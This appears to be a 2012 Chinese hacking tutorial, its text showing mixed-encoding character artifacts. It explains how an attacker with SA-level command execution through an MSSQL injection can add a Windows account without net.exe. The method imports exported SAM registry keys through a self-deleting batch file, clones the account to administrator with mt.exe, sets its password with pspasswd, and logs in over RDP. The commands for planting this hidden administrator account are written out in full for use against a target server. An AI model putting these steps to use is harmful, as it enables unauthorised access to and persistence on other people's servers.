實(shí)現(xiàn)無(wú)net.exe和net1.exe添加系統(tǒng)用戶(hù)
更新時(shí)間:2012-03-31 | 發(fā)布人:本站 | 點(diǎn)擊率:339 次
大家都知道在windows下添加用戶(hù)可以在CMD下用net命令來(lái)實(shí)現(xiàn)
格式為:net user username password /add
意思為添加一個(gè)用戶(hù)名為username密碼為password的用戶(hù)
如果要添加進(jìn)管理員組還可以用如下命令來(lái)實(shí)現(xiàn)
net localgroup administrators username /add
這樣就把用戶(hù)名為username的用戶(hù)加進(jìn)了管理員組
但是如果不用net.exe和net1.exe是不是就無(wú)法添加系統(tǒng)用戶(hù)了呢?
答案是否定的!
假設(shè)我們現(xiàn)在手上有一個(gè)SA權(quán)限的MSSQL注入點(diǎn)
3389開(kāi)放并允許連接登錄
可以通過(guò)注入工具執(zhí)行任意命令
但是管理員把net.exe和net1.exe改名或者直接刪除掉了
當(dāng)然這樣是可以通過(guò)上傳自己的net.exe和net1.exe再執(zhí)行添加用戶(hù)命令
但是為了說(shuō)明這種方法,我們不采用上傳net.exe和net1.exe的方法來(lái)解決!
首先要做的就是本地新建一個(gè)用戶(hù)
比如在本地添加一個(gè)用戶(hù)名為hackest的用戶(hù)
然后導(dǎo)出如下注冊(cè)表內(nèi)容:
HKEY_LOCAL_MACHINE\SAM\SAMDomains\Account\Users\Names\hackest
保存為hackest.reg
再導(dǎo)出注冊(cè)表內(nèi)容:
HKEY_LOCAL_MACHINE\SAM\SAMDomains\Account\Users\Names\下與hackest相對(duì)應(yīng)的鍵值
比如是000003F6
就導(dǎo)出:
HKEY_LOCAL_MACHINE\SAM\SAMDomains\Account\Users\Names\000003F6
保存為000003F6.reg
然后再寫(xiě)一個(gè)批處理文件,名為add.bat
add.bat文件內(nèi)容如下:
regedit /s hackest.reg
regedit /s 000003F6.reg
del hackest.reg
del 000003F6.reg
del add.bat
把這三個(gè)文件:hackest.reg、000003F6.reg、add.bat傳到目標(biāo)服務(wù)器上
運(yùn)行add.bat文件
上傳mt.exe運(yùn)行mt -chkuser命令
我們會(huì)發(fā)現(xiàn)已經(jīng)成功添加了一個(gè)用戶(hù)名為hackest的用戶(hù)
但是它并不屬于任何成員組
所以得把它克隆成管理員
假設(shè)管理員用戶(hù)為administrator,則命令為:
mt -clone administrator hackest
成功克隆為管理員后是不是就可以登錄3389了呢?
其實(shí)現(xiàn)在還不可以的
因?yàn)檫@個(gè)用戶(hù)的密碼問(wèn)題還沒(méi)有解決
我們可以用PS系列工具中的pspasswd.exe來(lái)解決密碼問(wèn)題
命令格式為:
pspasswd.exe username newpassword
在此例中命令則為:
pspasswd.exe hackest hackest
這樣就把用戶(hù)名為hackest的用戶(hù)密碼更改為hackest了
現(xiàn)在你可以放心地去連接登錄3389了,呵呵
其實(shí)完全可以通過(guò)上傳net.exe或net1.exe再執(zhí)行添加用戶(hù)的操作來(lái)達(dá)到目的
不過(guò)在這里只是為大家提供一個(gè)完全可以不用那兩個(gè)文件一樣能添加用戶(hù)的思路